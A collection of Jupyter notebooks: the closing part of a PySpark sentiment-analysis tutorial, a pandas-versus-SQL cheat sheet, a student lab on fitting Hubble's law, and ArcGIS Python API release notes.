train_stem = stem_pipeline.transform(train)\
.where(F.size(F.col("stemmed")) >= 1)
test_stem = stem_pipeline.transform(test)\
.where(F.size(F.col("stemmed")) >= 1)
# cache them to avoid running stemming
# each iteration in the grid search
train_stem.cache()
test_stem.cache()
```
Let's see some of the results of stemming the tweets:
```
test_stem.show(5)
```
We can see that the words 'baby' and 'beautiful' are reduced to 'babi' and 'beauti' respectively.
Let's now build our second pipeline (using TF-IDF and logistic regression) based off the pre-stemmed training dataset and test it on the pre-stemmed testing set.
```
# create the new pipline
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
lr = LogisticRegression(maxIter=20)
stemming_pipeline2 = Pipeline(stages= [tf3, idf, lr])
# fit and get predictions
model4 = stemming_pipeline2.fit(train_stem)
predictions4 = model4.transform(test_stem)
score4 = evaluator.evaluate(predictions4)
```
The AUC of the new model on the test set is,
```
print("AUC SCORE: {}".format(score4))
```
We can see that adding stemming degrades the AUC slightly compared to the baseline model, but *we'll keep using stemming in our future models since the jury's not out on whether it will improve future models*. One thing I will mention here is that I did try using stop word removal and stemming together, but this resulted in worse performance than just stop word removal alone.
As I mentioned previously, stemming using a customer Transformer is expensive. One way I could see that it is an expensive operation is by going to <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html">YARN</a> (on our cluster this is the address: http://mikescluster-m:8088) shown below:

Then clicking on ApplicationMaster in the bottom right hand corner. This leads you to the <a href="https://jaceklaskowski.gitbooks.io/mastering-apache-spark/spark-webui.html">Spark Web UI </a>page:

Clicking on stages we can see the time and memory it takes for each stage in our pipelines (or more generally jobs). I used the Spark Web UI constantly to track the progress of my jobs and noticed that stemming caused the TF-IDF stages to take much longer than they did without it.
## N-Grams And Parameter Tunning With Cross Validation <a class="anchor" id="bullet6"></a>
--------------------
The last preprocessing technique we'll try to improve the predictive power of our model is to use N-grams. This technique is used to capture combinations of words that effect the sentiment of the document. For instance the sentence,
the food is not bad
is naturally assumed to have a positive sentiment, or atleast non-negative sentiment. After tokenizing the sentence we would have the list,
["the", "food", "is", "not", "bad"]
Using the normal bag-of-words with TF-IDF, our model would see the word 'bad' and most likely assume the that the sentence has negative sentiment. This is because the presence of the token 'bad' is usually associated with a negative sentiment. What our model fails to ascertain is that the presence of the word 'not' before 'bad' leads to the combination 'not bad' which normally coincides with a positive sentiment. In order to pick up these types of combinations of words we introduce n-grams. Bigrams combine consecutive pairs of words in our bag-of-words model. Using bigrams the previous example sentence would be,
[["the", "food"], ["food, "is"], ["is", "not"], ["not,"bad"]]
Using bigrams our model will see be the combination `["not", "bad"]` and be able to ascertain that sentiment of the sentence is postive. Bigrams use consecutive pairs of words to form tokens for our model, N-grams generalize this process to combine N consecutive words to form tokens for our bag-of-words model.
Another thing I should point out is that **while using bigrams introduces consecutive pairs of words in documents as tokens in the bag-of-words model the order of those bigrams in the document is not taken into consideration. Each tweet is reduced to a set of bigrams and the bag-of-words model treats those bigrams similar to categorial features/one-hot encoding.** The difference with bag-of-words and one-hot encoding being that instead of the value in each column for a token being 0 or 1 based on its presence in the tweet, the value is 0-N with N being how many times the token appears in the tweet.
### Basic model with bigrams
We import the NGram class from the features module and use bigrams (`n=2`) for our model,
```
from pyspark.ml.feature import NGram
bigram = NGram(inputCol="tokens", outputCol="bigrams", n=2)
```
Then we form a pipeline by first tokenizing the words in the sentence, forming bigrams, performing TF-IDF and then fitting the logistic regressionm model. One thing to note is that introducing bigrams means that our bag-of-words model has features that are based on pairs of word instead of individual words. Since the number of combinations of pairs of words is "larger" than the number of individual words we increase the number of features in our model to `200,000` instead of `100,000`.
We define the new pipeline, train, test and evaluate the model:
```
tf5 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
bigram_pipeline = Pipeline(stages= [tk, bigram, tf5, idf, lr])
model5 = bigram_pipeline.fit(train)
predictions5 = model5.transform(test)
score5 = evaluator.evaluate(predictions5)
print("AUC SCORE: {}".format(score5))
```
We can see that using bigrams provides an improvement to the basic model!
### Stemming with bigrams
While using stemming alone did not lead to an improvement over our baseline model, using stemming with bigrams might lead to an improvement. My reason for believing this is that while bigrams improve the performance of our model, they also increases the dimension of our problem. By introducing stemming we would reduce the number of variations of the word pairs, (the variance in our data) and also the reduce the dimension of our feature space.
We create our new pipeline on the pre-stemmed training and testing datasets as well as evaulate the model:
```
bigram2 = NGram(inputCol="stemmed", outputCol="bigrams", n=2)
tf6 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
lr = LogisticRegression(maxIter=20)
stem_bigram_pipeline = Pipeline(stages= [bigram2, tf6, idf, lr])
model6 = stem_bigram_pipeline.fit(train_stem)
predictions6 = model6.transform(test_stem)
score6 = evaluator.evaluate(predictions6)
print("AUC SCORE: {}".format(score))
```
We can see that using bigrams and stemming leads to not only an improvement over the baseline model, but also the bigram model! My intuition was right! :)
Let's take a look at examples of what each stage in the above pipeline did to the tweet:
```
predictions6.select(["tweet_clean","tokens","stemmed","bigrams"]).show(5)
```
### Parameter Tunning Using A Grid Search
Now let's try to improve the performance of the stemming-bigram model by tunning the hyperparameters in some of the stages in the pipeline. Tunning the hyperparameters in our model involves using a grid search which evaluates all hyperparameters we want to consider and returns the model with the best results. In order to get the best results from our model for out-of-sample performance we perform <a href="https://en.wikipedia.org/wiki/Cross-validation_(statistics)">cross-validation</a> within each of the parameter values in the grid search. Using cross validation within the grid search reduces the chances of overfitting our model and will hopefully give us the best performance on the test set.
In order to perform a grid search with cross validation we import the classes,
```
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
```
Then define the model pipeline,
```
bigram2 = NGram(inputCol="stemmed", outputCol="bigrams", n=2)
tf6 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
idf = IDF(inputCol="rawFeatures", outputCol="features")
lr = LogisticRegression(maxIter=20)
stem_bigram_pipeline = Pipeline(stages= [bigram2, tf6, idf, lr])
```
Next we declare the 'hyperparamter grid' we want to search over using the `ParamGridBuilder` class,
```
paramGrid = ParamGridBuilder() \
.addGrid(idf.minDocFreq, [2, 5]) \
.addGrid(lr.regParam, [0.0, 0.1]) \
.build()
```
This is a small grid because the training time on tiny 2-node Hadoop cluster is somewhat long. Again, the point of this blogpost is not to get the best performance possibles, but rather to show how the pieces of the SparkML library fit together. I will remark that these hyperparameter choices just seeing what level or regularization we want to apply in feature generation stage (`idf.minDocFreq`) and model fitting stage (`lr.regParam`) of our ML Pipeline.
Now lets's define the grid search with cross validation using the `CrossValidator` class,
```
crossval = CrossValidator(estimator = stem_bigram_pipeline,
estimatorParamMaps = paramGrid,
evaluator = BinaryClassificationEvaluator(),
numFolds = 3)
```
Notice for that we need
- the Spark ML Pipeline
- the parameter grid values
- the metric used to evulate the performance of the models
- the size of the fold's (k) in cross validation
While values of `k=5` or `k=10` are most often used in cross validation we have large sample size in our training set and the time it takes to train on the cluster is long so I chose a smaller value of 3. We could also have used the <code>TrainValidationSplit</code> class which only evaluates each parameter choice once instead of multiple times over each of the $K$ folds in <code>CrossValidator</code>. This estimator is not as expensive as cross validation,
but can produce less reliable results when dataset isn't large enough. See the <a href="https://spark.apache.org/docs/latest/ml-tuning.html#train-validation-split">documenation</a> for more infromation.
Now we can perform the grid search!
```
model = crossval.fit(train_stem)
```
Then make predictions on testing set to get the model performance,
```
predictions = model.transform(test_stem)
score = evaluator.evaluate(predictions)
print("AUC SCORE: {}".format(score))
```
Notice that while this result is better than baseline model, it is not as good as the stemmed-bigram model we first came up with. We could ostensibly try more parameter values and larger $k$ values to get a better score, but the performance of this model is good enough.
Next let's get the accuracy of the model on the testing set. We do this by first getting the best model from the grid search,
```
bestModel = model.bestModel
```
Then we can get the accuracy just as we did with the baseline model,
```
predictedAndLabels = predictions.select(["prediction","label"])\
.rdd.map(lambda r : (float(r[0]), float(r[1])))
metrics = MulticlassMetrics(predictedAndLabels)
print("Test Set Accuracy: {}".format(metrics.accuracy))
```
81.5% accuracy with a AUC of 0.891 is pretty good for Twitter sentiment analysis!
Let's now find out what the parameters from the gridsearch are that resulted in the best model. We can see the various stages in the model pipeline by using the `.stages` command:
```
bestModel.stages
```
Then within each stage we can get the hyperparameter value by passing the name to the `explainParam` method:
```
bestModel.stages[2].explainParam('minDocFreq')
bestModel.stages[-1].explainParam('regParam')
```
We can see that the best model came from a result of having `minDocFreq=5` and `regParam=0.1` in the IDF and Logistic Regression stage of our pipeline respectively.
The last thing we'll do is get an idea of the ROC curve for our best model. I could only do this for the training set by getting the logistic regression stages' summary:
```
summary = bestModel.stages[-1].summary
```
Then getting the True Postive Rate and False Positive Rate below and plotting them against one another:
```
import matplotlib.pyplot as plt
plt.figure(figsize=(6,6))
plt.plot([0, 1], [0, 1], 'r--')
plt.plot(summary.roc.select('FPR').collect(),
summary.roc.select('TPR').collect())
plt.xlabel('False Positive Rare')
plt.ylabel('True Positive Rate')
plt.title("ROC Curve")
plt.show()
```
## Conclusions <a class="anchor" id="bullet7"></a>
----------------------
In this two part blog post we went over how to perform Extract-Transform-Load (ETL) for NLP using Spark and MongoDB and then how to build a machine learning model for sentiment analysis using SparkML on the Google Cloud Platform (GCP). In this post we focused on creating a machine learning model using <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a> starting out with a basic model using TF-IDF and logistic regression. We added different stages to our ML Pipeline such as removing stop words, stemming and using bigrams to see which procedure would improve the predictive performance of our model. In the process we also went over how to write our own custom transformer in PySpark. Once we settled on using stemming and bigrams in our model we performed a grid search using cross validation to obtain a model that has a AUC of 0.891 in the ROC curve and 81.5% accuracy which is not too shabby! One thing I didn't go over that is valuable is how to persist the ML Pipeline model to use again later without having to retrain, for that see <a href="https://spark.apache.org/docs/latest/ml-pipeline.html#ml-persistence-saving-and-loading-pipelines">here</a>.
| github_jupyter |
## Some useful analogies to SQL operations
Data set is a list of two columns, viz., userid and app name. See venn_sample_gen.py to generate this set.
Sample given below.
| userid | app |
|---------|------------|
| u000001 | ola |
| u000002 | freecharge |
| u000002 | mobikwik |
| u000002 | fastcab |
| u000003 | uber |
| u000003 | ola |
| u000003 | freecharge |
| u000004 | ola |
| u000004 | mobikwik |
| u000004 | uber |
| u000004 | fastcab |
| u000004 | freecharge |
```
import numpy as np
import pandas as pd
from pandas import Series, DataFrame, Panel
from odo import odo
# df = odo('venn_sample_gen.csv', pd.DataFrame)
df = pd.DataFrame(
[
('u000001','ola'),
('u000002','freecharge'),
('u000002','mobikwik'),
('u000002','fastcab'),
('u000003','uber'),
('u000003','ola'),
('u000003','freecharge'),
('u000004','ola'),
('u000004','mobikwik'),
('u000004','uber'),
('u000004','fastcab'),
('u000004','freecharge')
], columns=['userid','app']
)
df
```
#### how many users?
```sql
select count(distinct userid) from userapps
```
```
len(df.groupby('userid').groups)
```
#### users with more than X apps?
```sql
select userid, count(1) from userapps group by userid having count(1) > X order by 2 desc;
```
Let us assume X=2
```
MIN_APPS = 2
# all these below can be in one chained line; breaking it up for better readability
gf = DataFrame({'count':df.groupby('userid')['app'].count()})
gf = gf.reset_index().set_index('userid', drop=True)
gf = gf.query("count > %d" % MIN_APPS).sort_values('count', ascending=False)
gf
```
### get top 3 apps used
```sql
select * from (select app,count(userid) as users from userapps group by app order by 2 desc) x
limit 3
```
```
df.groupby('app')['userid'].count().sort_values(ascending=False)[:3]
```
### how many users have both uber and ola apps?
```sql
select o.userid from userapps o where o.app='uber' and exists
(select 1 from userapps i where i.userid=o.userid and i.app='ola')
```
I know this is better done using a join than exists; but for illustration, this is easier.
```
ola_and_uber = pd.merge(df.query("app == 'uber'"), df.query("app == 'ola'"), on='userid')
ola_and_uber
# now add a field that shows the other apps these particular set has
pd.merge(ola_and_uber, df.query("app not in ('ola','uber')"), on='userid')
```
### how many users use ola, but not uber?
```sql
select o.userid from userapps o where o.app='ola' and not exists
(select 1 from userapps i where i.userid=o.userid and i.app='uber')
```
```
bothusers = df.loc[df['app'].isin(['uber','ola'])]
uberusers = df.loc[df['app'] == 'uber']
bothusers.set_index("userid").index.difference(uberusers.set_index("userid").index)
```
### how do we transform data into a pivot for NoSQL fans?
```
userapps = DataFrame({'apps':df.groupby('userid')['app'].apply(tuple)})
userapps
```
| github_jupyter |
### *** Names: [Insert Your Names Here]***
# Lab 4 - Plotting and Fitting with Hubble's Law
```
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
<div class=hw>
## Exercise 1
In the cell below, I have transcribed the data from Edwin Hubble's original 1928 paper "A relation between distance and radial velocity among extra-galactic nebulae", available [here](https://www.pnas.org/content/pnas/15/3/168.full.pdf).
a. Open the original paper. Use it and your knowledge of Python code to decipher what each line in the next two code cells is doing. Add a comment at the top of each line stating what it is doing and/or where in the paper it came from.
b. Create a scatter plot from Hubble's data. To make a scatterplot in python, you use the same plt.plot function that we used for line graphs last week except after the x and y arguments, you add a string describing the type of plotting symbol that you want. [Here](https://matplotlib.org/3.1.1/api/markers_api.html) is a list of plot symbols. Note that you can combine these with colors so, for example, 'go' is green circles and 'rx' is red xs. Give your plot a title and axis labels to match Hubble's original.
c. Write code that will print each entry in the list obj_list on its own line (you will need this for exercise 2, below).
```
NGC_nos = [6822,598,221,224,5457,4736,5194,4449,4214,
3031,3627,4826,5236,1068,5055,7331,4258,
4151,4382,4472,4486,4649]
obj_list = ['SMC', 'LMC']
for i in np.arange(len(NGC_nos)):
obj_list.append('NGC '+str(NGC_nos[i]))
dists = np.array([0.032,0.034,0.214,0.263,0.275,0.275,0.45,0.5,0.5,0.63,0.8,0.9,0.9,
0.9,0.9,1.0,1.1,1.1,1.4,1.7,2.0,2.0,2.0,2.0])#Mpc
vels = np.array([170.,290,-130,-70,-185,-220,200,290,270,200,300,-30,650,150,500,920,450,500,500,960,500,850,800,1000]) #km/sec
#plot goes here
#loop to print names goes here
```
<div class=hw>
## Exercise 2
Now, let's pull modern data for Hubble's galaxies. Copy and paste the list from Exercise 1c into the query form [here](http://ned.ipac.caltech.edu/forms/gmd.html). ***Before you click "Submit Query"***, scroll to the check boxes at the bottom of the page and make sure to check ***only*** the following:
* User Input Object Name
* Redshift
* Redshift Uncertainty
And in the bottom right panel:
* Metric Distance
* Mean
* Standard Deviation
* Number of measurements
Open the Macintosh application "TextEdit" and copy and paste the table into it. From the Format menu, select "make plain text" and then save it as cat.txt in the same folder as your Lab3 notebook.
The code cells below will "read in" the data using a python package called Pandas that we will learn about in great detail in the coming weeks. For now, just execute the cell below, which will create python lists stored in variables with descriptive names from your cat.txt file.
a)Describe in words at least two patterns that you note in the tabular data
b) Make a histogram for each of the following quantities: redshift, redshift_uncert, dist, and dist_uncert. All your plots should have axis labels, and for the histograms you should play around with the number of bins until you can justify your choice for this value. Discuss and compare the shapes of the distributions for each of the quantities in general, qualitative terms.
c) Plot the uncertainty in redshift as a function of redshift for these galaxies and the uncertainty in distance as a function of distance. What patterns do you notice, if any in the relationships between these quantities and their uncertainties?
```
import pandas
cols = ['Obj Name', 'Redshift', 'Redshift Uncert', 'Dist Mean (Mpc)', 'Dist Std Dev (Mpc)', 'Num Obs']
df = pandas.read_csv('cat.txt', delimiter ='|', skiprows=3, header = 0, names = cols, skipinitialspace=True)
redshift = df["Redshift"].tolist()
redshift_uncert = df["Redshift Uncert"].tolist()
dists2 = df["Dist Mean (Mpc)"].tolist()
dists2_uncert = df["Dist Std Dev (Mpc)"].tolist()
#display table (python "data frame" object)
df
```
***Answer to Part a***
```
#plots for part b - redshift
#plots for part b - redshift uncertainty
#plots for part b - distance
#plots for part b - distance uncertainty
```
***Part B explanation***
```
#part c scatter plot 1
#part c scatter plot 2
```
***Part C explanation***
<div class=hw>
## Exercise 3
The conversion between redshift (z) as provided in the database and recessional velocity as provided in Hubble's original paper is given by the formula below.
$$z=\sqrt{\frac{1+\beta}{1-\beta}}$$
where $\beta$=v/c. This formula can also be written as:
$$\beta=\frac{(z+1)^2-1}{(z+1)^2+1}$$
(a) Write a function with an appropriate docstring that applies this forumula to an input array. Your function should return an array of velocities in km/sec.
b) Apply your new function to your redshift and redshift uncertainty arrays here to translate them to "recessional velocities", as in Hubble's original plot
\* Note that technically we should do some more complicated error propagation here, and we will discuss this later in this class. Luckily though, this formula is roughly equivalent to z = v/c, which means that errors in z and v can be directly translated.
```
#part a here
#part b here
```
<div class=hw>
## Exercise 4
Make the following plots, with appropriate axis labels and titles.
a) A plot of the new data similar to the one you made in exercise 1, only with error bars. Use the function plt.errorbar and inflate the errors in the modern recessional velocities by a factor of 10, because they are actually so small for these very nearby galaxies with today's measurement techniques, that we can't even see them unless we
b) A plot showing both the new and old data overplotted, with different colors for each and a legend.
c) A plot showing Hubble's distances vs. the new distances, with a "
1 to 1" line overplotted
d) A plot showing Hubble's recessional velocities vs. the new velocities, with a "1 to 1" line overplotted
e) Discuss at least two trends that you see in the graphs and make a data-driven argument for how they might explain the discrepancy between the modern values and Hubble's. As always, your explanations need not be lengthy, but they should be ***clear and specific***.
```
#Plot a here
#Plot b here
#Plot c here
# Plot d here
```
***Part e explanations here***
***We will do the exercise below in class next week and you should not attempt it now. However, it builds directly on this lab, so take some time with your lab mates to think about how you will approach it, since you will only have one 50min class period in which to answer it.***
## In-Class Exercise for Next Week
Time for fitting! Use the lecture notes on Model fitting as a guide to help you.
a) Fit a linear model to Hubble's data and to the modern data. Make a plot showing both datasets and both fit lines. The plot should include a legend with both the points and the lines. The lines should be labeled in the legend with their equations.
b) Now, let's fit a linear model to the modern data that takes the error bars in the recessional velocities into account in the fit. The problem here though is that the uncertainties in redshifts/recessional velocities are VERY small for these galaxies. So small in fact that when you overplot error bars on the data points you can't even see them (you can do this to verify). So to demonstrate differences between weighted and unweighted fits here, let's inflate them by a factor of 50. Overplot both the unweighted and weighted lines together with the modern data (with y error bars) and an appropriate legend.
c) Discuss at least one trend or effect that you see in each graph. As always, your explanations need not be lengthy, but they should be ***clear, supported with references to the plot, and specific***.
d) We won't do fitting with x and y error bars, but you can easily make a plot that shows errors in both quantities using plt.errorbar. Do this using the TRUE errors in velocity and distance (not the inflated values), and use your plot to make an argument about whether the "Hubble's Law" line is a good fit to the data.
```
#import relevant modules here
#define a linear model function here
#calculate the values for your two fits here and print their values (to label lines)
#plot 1 goes here
#weighted fit goes here
#plot with error bars goes here
```
***Discuss trends or effects seen here***
```
#plot with x AND y errors goes here
from IPython.core.display import HTML
def css_styling():
styles = open("../../custom.css", "r").read()
return HTML(styles)
css_styling()
```
| github_jupyter |
# What's new in version 1.5
#### New
* Updated the **[`Map Widget`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#mapview)** to use the **[ArcGIS API for JavaScript 4x](https://developers.arcgis.com/javascript/)** release
* Broader support for authoring and rendering `WebScenes`
* Full support for [`JupyterLab`](http://jupyterlab.readthedocs.io/en/stable/getting_started/overview.html). See **[JupyterLab Guide](http://../using-the-jupyter-lab-environment)**.
* Support for specifying `autocast` JavaScript renderers from Python code
* Support for exporting `Map Widgets` to standalone HTML pages
* Support for using an external ArcGIS API for JavaScript CDN for disconnected environments
* Miscellaneous bug fixes
* Added the new **`Spatially Enabled Dataframe`** to eventually replace the [`SpatialDataFrame`()](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe) class
* New implementation: **Accessor-based** `spatial` namespace accessible as the `sdf` property on a Pandas dataframe
* Improvements to rendering, projections and support for Arcade expressions
* Added `usage` property on [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#item) class to inspect individual statistics
* Added attribute checks for geometries in environments where `ArcPy` is not available
* Added `summary` property to [`arcgis.admin.ux`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#ux) to add description of Portal or ArcGIS Online Organization instance
* Added support for using server raster functions in raster analytics jobs using [`apply()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#apply)
* Enhancements to support for [`mosaic_rules`](https://developers.arcgis.com/documentation/common-data-types/mosaic-rules.htm) on `ImageryLayers`, incdluding when using [`save()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#imagerylayer) and [`identity()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#arcgis.raster.functions.identity)
* Added [`AssignmentIntegrationManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.managers.html#arcgis.apps.workforce.managers.AssignmentIntergrationManager) class to [`Workforce`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.html) module as the `integrations` property on a [`Project`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.html#project)
* Added url builder functions to the [`apps`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.html) module
* Enhanced numerous [`Global Raster functions`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#module-arcgis.raster.functions.gbl) with parameter validation checks, including [`cost_distance()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#cost-distance), [`cost_allocation()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#cost-allocation), [`flow_distance()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#flow-distance), [`zonal_statistics()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#zonal-statistics) and others
* Added `cost_backlink()`, `euclidean_direction()`, `cost_path()`, `kernel_density()`, and `calculate_travel_cost()` to Global Raster Functions and `optimum_travel_cost_network()` to Raster Analytics
* Added `category_filters` parameter to improve [`search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.search) capabilities
* Added `find_centroids` function to [`arcgis.features.find_locations`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.find_locations.html) submodule
#### Fixes
* Fixed BUG-000114520 where assigning categories with a Python script removed previously assigned categories
* Fixed issue when returning sharing properties on an `Item` if item is in a folder
* Fixed issue when passing colors in as a list on the `Spatially Enabled Dataframe`
* Fixed issue where [`arcgis.network.analysis.solve_vehicle_routing_problem`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.network.analysis.html#solve-vehicle-routing-problem) failed because of missing parameters
* Fixed mis-matched parameters on the [`SyncMananger.synchronize()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.SyncManager.synchronize) method
* Fixed issue where `spatial_join`() failed if `ArcPy` was not available in the environment
* Fixed issue when exporting to a feature class failed if `ArcPy` was not available in the environment
* Fixed issue where creating a `FeatureSet` from a `Pandas dataframe` failed
* Fixed issue on the `Spatially Enabled Dataframe plot` method using the unique values renderer
* Fixed issue for ensuring valid values passed to the `rendering_rules` parameter of the [`ImageryLayer`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#imagerylayer) `identify()` and `computer_stats_and_histogrames()` functions
* Added `item_rendering_rule` parameter to [`ImageryLayer.mosaic_by()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.mosaic_by) function
* Corrected invalid internal key in [`ImageryLayer.mosaic_rule()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.mosaic_rule)
* Updated parameters in the [`GeoAnalytics`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.toc.html#module-arcgis.geoanalytics) [`summarize_data.summarize_within()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#summarize-within), [`find_locations.detect_incidents()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.find_locations.html#detect-incidents), and [`analyze_patters.find_hot_spots()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.analyze_patterns.html#find-hot-spots) functions
* Fixed [`GeoAnalytics.find_locations.geocode_locations()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.find_locations.html#geocode-locations) function
* Increased flexibility of the [`output_datastore`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.env.html#output-datastore) environment variable
* Fixed issue where dates older than the Unix Epoch caused failures
* Fixed issue where [`Item.protect()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.protect) failed to repopulate the Item object
* Fixed bug in [`gis.admin.SSLCertificates.get()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#arcgis.gis.admin.SSLCertificates.get) method and improved documentation
* Fixed issue where [`Item.comments`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.comments) and [`Item.add_comment()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.add_comment) returned invalid URL
* Added [`LicenseManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#license-manager) documentation to the [`arcgis.gis.admin`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html)
* Fixed issue with [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) function failing to update paths for Tiled Map Service Layers
* Added [`create_thumbnail()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.create-thumbnail) function to `Item` class
* Fixed issue where [`arcgis.server.Server()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.server.html#server) did not read the `verify_cert` parameter
* Fixed [`FeatureLayerCollectionManager.overwrite()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.overwrite) method to work with Portal items
* **Available at ArcGIS Enterprise 10.7:** Added [`arcgis.geonalytics.manage_data.clip_layer()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html#calculate-fields) functionality
# What's new in version 1.4.2
#### New
* Added a `storymap` submodule to the [`arcgis.apps`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.html) module to work with [ArcGIS StoryMaps](https://storymaps.arcgis.com/en/app-list/map-journal/)
* Added support for [registering data](http://enterprise.arcgis.com/en/server/latest/publish-services/windows/overview-register-data-with-arcgis-server.htm) and adding [`big data files shares`](http://enterprise.arcgis.com/en/server/latest/get-started/windows/what-is-a-big-data-file-share.htm) from Cloud Stores
* Added `bulk_update()` function to `ContentManager` to update properties on a collection of items
* Added a new [Orthomapping](http://pro.arcgis.com/en/pro-app/help/data/imagery/introduction-to-ortho-mapping.htm) module
* Enhanced [`clone()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) of [`feature layer views`](https://doc.arcgis.com/en/arcgis-online/manage-data/create-hosted-views.htm) to support varied rendering and template definitions
* Improved `clone()` of Pro Maps and Survey123 Forms
* Added support for `clone()` of [Vector Tile Style Items](https://www.esri.com/arcgis-blog/products/developers/mapping/design-custom-basemaps-with-the-new-arcgis-vector-tile-style-editor/)
* Improved performance when using `clone()` on `feature services`
* Added `default_aggregation_styles` environment setting to [`gis.env`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.env.html)
* Improved handling of date fields with the [`Spatial DataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
#### Fixes
* Fixed BUG-000110440 corrected misspelled `suppress_email` parameter that caused `gis.admin.license.revoke()` to fail
* Fixed BUG-000110659 added missing `text` parameter on [`item.update()`]() `item_properties` dictionary
* Fixed error when writing `geojson` files to `shapefiles` using the [`SpatialDataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
* Fixed erroneous documentation stating that [`overwrite`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.overwrite) preserves symbology
* Fixed issue with `SpatialDataFrame` where null geometries were not converted to empty geometries in Shapefiles and Geodatabase feature classes
* Fixed issue where [`plot()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#arcgis.features.SpatialDataFrame.plot) method failed with certain number of features
* Fixed issue where [`GIS`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#gis) `profile` parameter would not create new profile in clean environment
* Fixed bug when importing [`arcgis.geoenrichment`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoenrichment.html)
# What's new in version 1.4.1
#### New
* Simplified `time_filter` parameter for a [`query()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html?highlight=time_filter#arcgis.features.Table.query) to accept Python [`datetime`](https://docs.python.org/3/library/datetime.html) module `date`, `time`, or _timestamp_ objects
* Added support for [`append_data()`](https://developers.arcgis.com/rest/services-reference/append-data.htm) tool to the [`arcgis.geoanalytics.manage_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html) submodule
* Added support for [`overlay_layers`](https://developers.arcgis.com/rest/services-reference/overlay-layers.htm) to [`arcgis.geoanalytics.manage_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html) submodule
* Added support for a new `build_multivariable_grid` tool in the [`arcgis.geoanalytics.summarize_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html) submodule
* Added documentation for layer filtering options when using [`arcgis.geoanalytics`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.toc.html) functions
